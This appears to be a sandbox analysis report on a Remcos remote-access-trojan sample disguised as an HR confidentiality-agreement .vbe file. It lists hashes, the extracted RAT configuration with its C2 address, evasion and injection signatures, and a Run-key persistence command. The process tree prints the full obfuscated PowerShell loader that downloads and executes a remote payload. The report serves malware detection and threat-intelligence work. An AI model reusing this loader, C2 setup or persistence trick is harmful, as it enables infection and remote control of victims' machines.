Analysis
-
max time kernel
148s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
02/10/2023, 16:37
Static task
static1
Behavioral task
behavioral1
Sample
Confidentiality Agreement_HR 01-10-23_.vbe
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
Confidentiality Agreement_HR 01-10-23_.vbe
Resource
win10v2004-20230915-en
General
-
Target
Confidentiality Agreement_HR 01-10-23_.vbe
-
Size
33KB
-
MD5
01e81d4fc67a80709de21ef30845ad90
-
SHA1
69e8680aaadf264e8100f0f40b656bf512e8b1e3
-
SHA256
9fa67b86f2d5d9d4936440857921d50962d21bf399e593d0911e1fd0e4f277e3
-
SHA512
96137b3217ad06932f66040afa5e5e62c12b0867aa7bc52486c921d66c64ea26bb8c45de6156ca8ccabeda8bbfb7deab4d862034e2ea8c802ffdf71f71f80ff2
-
SSDEEP
768:zglkuxRoJwY8lobdFGS0gGJNJ4hht/X93NJG1azh:4RGwXEAytF9JG1M
Malware Config
Extracted
remcos
RemoteHost
45.95.169.191:2404
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-4I6KHO
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Checks QEMU agent file 2 TTPs 2 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
description ioc Process File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe powershell.exe File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe wab.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation WScript.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key = "%EntryA% -windowstyle hidden $Inte=(Get-ItemProperty -Path 'HKCU:\\Snif\\').Rege;%EntryA% ($Inte)" wab.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 684 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 792 powershell.exe 684 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 792 set thread context of 684 792 powershell.exe 102 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 820 powershell.exe 820 powershell.exe 792 powershell.exe 792 powershell.exe 792 powershell.exe 792 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 792 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 820 powershell.exe Token: SeDebugPrivilege 792 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 684 wab.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 684 wab.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 1224 wrote to memory of 820 1224 WScript.exe 87 PID 1224 wrote to memory of 820 1224 WScript.exe 87 PID 820 wrote to memory of 792 820 powershell.exe 91 PID 820 wrote to memory of 792 820 powershell.exe 91 PID 820 wrote to memory of 792 820 powershell.exe 91 PID 792 wrote to memory of 684 792 powershell.exe 102 PID 792 wrote to memory of 684 792 powershell.exe 102 PID 792 wrote to memory of 684 792 powershell.exe 102 PID 792 wrote to memory of 684 792 powershell.exe 102 PID 792 wrote to memory of 684 792 powershell.exe 102
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Confidentiality Agreement_HR 01-10-23_.vbe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1224 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Broedgrup9 ([String]$Periost){$Materia = $Periost.Length;For($Befordri=4; $Befordri -lt $Materia-1; $Befordri+=(4+1)){$Enfranc=$Enfranc+$Periost.Substring( $Befordri, 1)};$Enfranc;}$Fugle=Broedgrup9 'dhamhGermtStritSukkpBrne: Spl/ Cir/LandmalgoiRails AntsBskteMorgnGlobdUlriemusinKommrNautaVoksiPestl SikwSeptaSeleyKonsm BaloObeld ViseAfgil LaslRekue CherFabusGlac.Kupmoudrur MongDeop.DeccuSierkAfho/prestResieOvers Supt Smi/ BunIFireoBerunOxfliApots CacaExen.NaadsvectnHeikp Pre ';$Skatteske=$Fugle.split([char]62);$Fugle=$Skatteske[0];$Enfranc01=Broedgrup9 'OveriWanie apoxpret ';$Dygtig = Broedgrup9 'Udsp\LocrsBerryIndbsImbewBaduoNonewSims6Unde4 Bil\CellWKoluistecnFlagdPengoTillw Dels NeuPLsniomellwstene ScarUndeSForlhTacae OctlEhatlFiss\ IndvEpei1Dete.Cont0Moto\pultpTogpourfuwinnee SlirTolksbedbhDekreRytmlVirglPlas.Indse TitxUnaneFrug ';.($Enfranc01) (Broedgrup9 ' Reb$CradKStaroSexsnKolotAfleu AnorUninepilu2Eliz2Wate7Ddsa2Legi=Arab$Konve MulnFirevNavi:SkufwPatri BumnFiltdkursi Tenr Fst ') ;.($Enfranc01) (Broedgrup9 'Bade$ SteDPinuyVaccgPelst ConiSigtgGrun=Abst$UpheKStudoHypen fustparduRdserThrueEjen2Benn2Nebi7Siph2Ving+Cura$ SigDFlasyTokag KlatjustiDispgNona ') ;.($Enfranc01) (Broedgrup9 'Slgt$ForvPOweor SkuoRgfabServl OsmeAgeimbordiUnpazDioseIndl seas=Pamp Info( Taa(KaskgDeduwElekmGulvi Und DemwtriaiSyltnDkfa3bind2milj_ dagpBedrr VasoAadrctryge marsVejrsThal Bajo-ReknFskrm SolsPAnglrGamboRenecFinseMedfsCephsFrydIVatpd Eng=Tids$Snud{epidPforuIKnirDgogg}Unsa)Tunn.ForsCSpeloMillmFlerm GrnaRedenOverdkatrLBalki Diln upweAnti)auto Var- GensTrykpEuphlRisti PietSves Snk[ LancKonfhFjleaConsr Vej]Anac3Pari4Calv ');.($Enfranc01) (Broedgrup9 'Sprj$CoatRFireaFrikr Anli Arbf Lyd Nor=Yohi Denb$RigsPCausrYerbo DivbAtomlInpueDrivmNopriContz Foreapos[Glow$VivaPVictrNvero CombverslRushescatmCrati Sprz MaceBawd.UpsecPabbo OveuholsnUnput Fel-Scra2Wels]Akkv ');.($Enfranc01) (Broedgrup9 ' cho$HypoENulpkDefisVninp FjeoInnurSkgvt ParrCoraeAdko=Acar(AnskTleuke kvksabsytWeal-ForsPFysiaSpiltDubbhmicr Skih$ReshDFeriyMdebgFjert SauiUndeg Ste)Acro Dis-RygeABacknathed Geo Felo(Psyc[PeriI SpinKreetPrioPReagtStrarQuie] Mes:Velm:ImmesInceiMetazNonae Irr Resu-Coune genqStem Pert8 Spi)femi ') ;if ($Eksportre) {.$Dygtig $Rarif;} else {;$Enfranc00=Broedgrup9 ' ZugS EsctCoccaOverrYndltDepr-TeasBAdjuiPaintPeotsYnglTOverr AskaKautn EjesKnivfBlddeennerpela Chan-AbonSBoksoDoceuTurrrKelhcDisteUrhn Del$ChemF ZeuuFeasgPosilAmate sex Atl-DksbDfrakefores MustWindiJujunGuata SuptHandiIncoo KapnTakt Guet$ StrKGebioArdenWientSlaguIndirAngleDyna2 Cir2Spin7Repl2roin ';.($Enfranc01) (Broedgrup9 ' Lov$AndiKFejeoSupenTramtremiu ResrKaraeFina2Bevi2 Meg7 Dec2 Mai=Skyt$ConveVerbnDictvStri: Reka UdvpForspIriddskovaTeactNondaBest ') ;.($Enfranc01) (Broedgrup9 ' ArtISabemLawyp UndoBaror Svat For-TakoMSignoProbdNongu DimlRampe Kil LendBaffaiAgittFidusRobiTBrogrPhysaPrisnKraksEurof Tame BrsrPolk ') ;$Konture2272=$Konture2272+'\Corrobor.Svr';.($Enfranc01) (Broedgrup9 'Udta$winiS MvelTelevUnlisNose= Gge(EndaTCladeBekvspreat Agr-NonpPSubsaIndstOutrhTere Gri$AspiKFlanoPostnUdspt HaluForbrpepte Rug2gabi2Cycl7Expr2Omfa)Pinc ') ;while (-not $Slvs) {.($Enfranc01) (Broedgrup9 'Tegn$DicaS PrelFortvManjsVill= Raa(ScopTFalle UndsFlettPoly- MisP PneaCesstSmaahDips Wres$SejlKteksoSuppnMurrt OveuLogfrKofeeStik2 Hjm2 Cho7 hem2Hjre) Ali ') ;.($Enfranc01) $Enfranc00;.($Enfranc01) (Broedgrup9 'TyenSVoldt YaraInder FritDete-TonsS BarlSphee Trie Skrp Fet Kamm5 Ant ');$Fugle=$Skatteske[$Sammenh++%$Skatteske.count];}.($Enfranc01) (Broedgrup9 'Genf$ SupBTalerHypeoassie pardIndpgHngerSelvuSkompvaku cen=Hypn bidGLollePachtCate- TraCNvneoLynbnLatitNonseZygon ildtAdor Whit$ OveK FogoOutbnsupetQualuMusirBlodeHvse2Fejl2Ente7Uncl2Disa ');.($Enfranc01) (Broedgrup9 'Skmt$TaphSConvc PesaPensr NonpSektaKojibMyst Chin=Reno Supe[duplSOvery AkvsTovrtFeheePeabmCoar.KretCDyrtoSpilnDrifv Adde RevrPrectKval] Tra:Fort:LokaFEnsarDeseoGlasmSteeB Skoa BlusUdveeGibb6Inte4AbarSSkiltDiskrDelmiBrutn TougBrug( Erh$AkklBRkenraudioUvaneTenodTringAnorrTracudeltpHock)Knav ');.($Enfranc01) (Broedgrup9 'Kirk$AcceECollnLokaf AsyrChymaMillnnatscanda2Verm non=Krus Anti[GrapSAvocyHpovsNondtFilteTandm Fad.CleaTColle WooxBaertAnti.WaagEBiocnDanscBetaoSiredInteiAsepn FidgThro]Dema:Regi:SoutAOmbrSbrowCUnbuI ObnIFlge.ThorG forePlott SolSBoritTinnr VediIntenUndegAnta(stud$MateS FilcUdtaa Gher MispKartaFrdib Dir) Uns ');.($Enfranc01) (Broedgrup9 'Trst$StraMXanteArsotpreceubunoToerrThoroNykalAnanoTermgBall=Brys$VillEMontnOplsfSammrPriva FrinExprcMund2Astm.TribsOphiuPlafb PensChartBehor Modi SkonKrekgFakt(Subs2jakk3Damo7Gste0Ever3Conv7Avan,Anth2Vogn3Titt4 Maa4 Alb4Dato) Bed ');.($Enfranc01) $Meteorolog;}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:820 -
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Broedgrup9 ([String]$Periost){$Materia = $Periost.Length;For($Befordri=4; $Befordri -lt $Materia-1; $Befordri+=(4+1)){$Enfranc=$Enfranc+$Periost.Substring( $Befordri, 1)};$Enfranc;}$Fugle=Broedgrup9 'dhamhGermtStritSukkpBrne: Spl/ Cir/LandmalgoiRails AntsBskteMorgnGlobdUlriemusinKommrNautaVoksiPestl SikwSeptaSeleyKonsm BaloObeld ViseAfgil LaslRekue CherFabusGlac.Kupmoudrur MongDeop.DeccuSierkAfho/prestResieOvers Supt Smi/ BunIFireoBerunOxfliApots CacaExen.NaadsvectnHeikp Pre ';$Skatteske=$Fugle.split([char]62);$Fugle=$Skatteske[0];$Enfranc01=Broedgrup9 'OveriWanie apoxpret ';$Dygtig = Broedgrup9 'Udsp\LocrsBerryIndbsImbewBaduoNonewSims6Unde4 Bil\CellWKoluistecnFlagdPengoTillw Dels NeuPLsniomellwstene ScarUndeSForlhTacae OctlEhatlFiss\ IndvEpei1Dete.Cont0Moto\pultpTogpourfuwinnee SlirTolksbedbhDekreRytmlVirglPlas.Indse TitxUnaneFrug ';.($Enfranc01) (Broedgrup9 ' Reb$CradKStaroSexsnKolotAfleu AnorUninepilu2Eliz2Wate7Ddsa2Legi=Arab$Konve MulnFirevNavi:SkufwPatri BumnFiltdkursi Tenr Fst ') ;.($Enfranc01) (Broedgrup9 'Bade$ SteDPinuyVaccgPelst ConiSigtgGrun=Abst$UpheKStudoHypen fustparduRdserThrueEjen2Benn2Nebi7Siph2Ving+Cura$ SigDFlasyTokag KlatjustiDispgNona ') ;.($Enfranc01) (Broedgrup9 'Slgt$ForvPOweor SkuoRgfabServl OsmeAgeimbordiUnpazDioseIndl seas=Pamp Info( Taa(KaskgDeduwElekmGulvi Und DemwtriaiSyltnDkfa3bind2milj_ dagpBedrr VasoAadrctryge marsVejrsThal Bajo-ReknFskrm SolsPAnglrGamboRenecFinseMedfsCephsFrydIVatpd Eng=Tids$Snud{epidPforuIKnirDgogg}Unsa)Tunn.ForsCSpeloMillmFlerm GrnaRedenOverdkatrLBalki Diln upweAnti)auto Var- GensTrykpEuphlRisti PietSves Snk[ LancKonfhFjleaConsr Vej]Anac3Pari4Calv ');.($Enfranc01) (Broedgrup9 'Sprj$CoatRFireaFrikr Anli Arbf Lyd Nor=Yohi Denb$RigsPCausrYerbo DivbAtomlInpueDrivmNopriContz Foreapos[Glow$VivaPVictrNvero CombverslRushescatmCrati Sprz MaceBawd.UpsecPabbo OveuholsnUnput Fel-Scra2Wels]Akkv ');.($Enfranc01) (Broedgrup9 ' cho$HypoENulpkDefisVninp FjeoInnurSkgvt ParrCoraeAdko=Acar(AnskTleuke kvksabsytWeal-ForsPFysiaSpiltDubbhmicr Skih$ReshDFeriyMdebgFjert SauiUndeg Ste)Acro Dis-RygeABacknathed Geo Felo(Psyc[PeriI SpinKreetPrioPReagtStrarQuie] Mes:Velm:ImmesInceiMetazNonae Irr Resu-Coune genqStem Pert8 Spi)femi ') ;if ($Eksportre) {.$Dygtig $Rarif;} else {;$Enfranc00=Broedgrup9 ' ZugS EsctCoccaOverrYndltDepr-TeasBAdjuiPaintPeotsYnglTOverr AskaKautn EjesKnivfBlddeennerpela Chan-AbonSBoksoDoceuTurrrKelhcDisteUrhn Del$ChemF ZeuuFeasgPosilAmate sex Atl-DksbDfrakefores MustWindiJujunGuata SuptHandiIncoo KapnTakt Guet$ StrKGebioArdenWientSlaguIndirAngleDyna2 Cir2Spin7Repl2roin ';.($Enfranc01) (Broedgrup9 ' Lov$AndiKFejeoSupenTramtremiu ResrKaraeFina2Bevi2 Meg7 Dec2 Mai=Skyt$ConveVerbnDictvStri: Reka UdvpForspIriddskovaTeactNondaBest ') ;.($Enfranc01) (Broedgrup9 ' ArtISabemLawyp UndoBaror Svat For-TakoMSignoProbdNongu DimlRampe Kil LendBaffaiAgittFidusRobiTBrogrPhysaPrisnKraksEurof Tame BrsrPolk ') ;$Konture2272=$Konture2272+'\Corrobor.Svr';.($Enfranc01) (Broedgrup9 'Udta$winiS MvelTelevUnlisNose= Gge(EndaTCladeBekvspreat Agr-NonpPSubsaIndstOutrhTere Gri$AspiKFlanoPostnUdspt HaluForbrpepte Rug2gabi2Cycl7Expr2Omfa)Pinc ') ;while (-not $Slvs) {.($Enfranc01) (Broedgrup9 'Tegn$DicaS PrelFortvManjsVill= Raa(ScopTFalle UndsFlettPoly- MisP PneaCesstSmaahDips Wres$SejlKteksoSuppnMurrt OveuLogfrKofeeStik2 Hjm2 Cho7 hem2Hjre) Ali ') ;.($Enfranc01) $Enfranc00;.($Enfranc01) (Broedgrup9 'TyenSVoldt YaraInder FritDete-TonsS BarlSphee Trie Skrp Fet Kamm5 Ant ');$Fugle=$Skatteske[$Sammenh++%$Skatteske.count];}.($Enfranc01) (Broedgrup9 'Genf$ SupBTalerHypeoassie pardIndpgHngerSelvuSkompvaku cen=Hypn bidGLollePachtCate- TraCNvneoLynbnLatitNonseZygon ildtAdor Whit$ OveK FogoOutbnsupetQualuMusirBlodeHvse2Fejl2Ente7Uncl2Disa ');.($Enfranc01) (Broedgrup9 'Skmt$TaphSConvc PesaPensr NonpSektaKojibMyst Chin=Reno Supe[duplSOvery AkvsTovrtFeheePeabmCoar.KretCDyrtoSpilnDrifv Adde RevrPrectKval] Tra:Fort:LokaFEnsarDeseoGlasmSteeB Skoa BlusUdveeGibb6Inte4AbarSSkiltDiskrDelmiBrutn TougBrug( Erh$AkklBRkenraudioUvaneTenodTringAnorrTracudeltpHock)Knav ');.($Enfranc01) (Broedgrup9 'Kirk$AcceECollnLokaf AsyrChymaMillnnatscanda2Verm non=Krus Anti[GrapSAvocyHpovsNondtFilteTandm Fad.CleaTColle WooxBaertAnti.WaagEBiocnDanscBetaoSiredInteiAsepn FidgThro]Dema:Regi:SoutAOmbrSbrowCUnbuI ObnIFlge.ThorG forePlott SolSBoritTinnr VediIntenUndegAnta(stud$MateS FilcUdtaa Gher MispKartaFrdib Dir) Uns ');.($Enfranc01) (Broedgrup9 'Trst$StraMXanteArsotpreceubunoToerrThoroNykalAnanoTermgBall=Brys$VillEMontnOplsfSammrPriva FrinExprcMund2Astm.TribsOphiuPlafb PensChartBehor Modi SkonKrekgFakt(Subs2jakk3Damo7Gste0Ever3Conv7Avan,Anth2Vogn3Titt4 Maa4 Alb4Dato) Bed ');.($Enfranc01) $Meteorolog;}"3⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:792 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:684
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82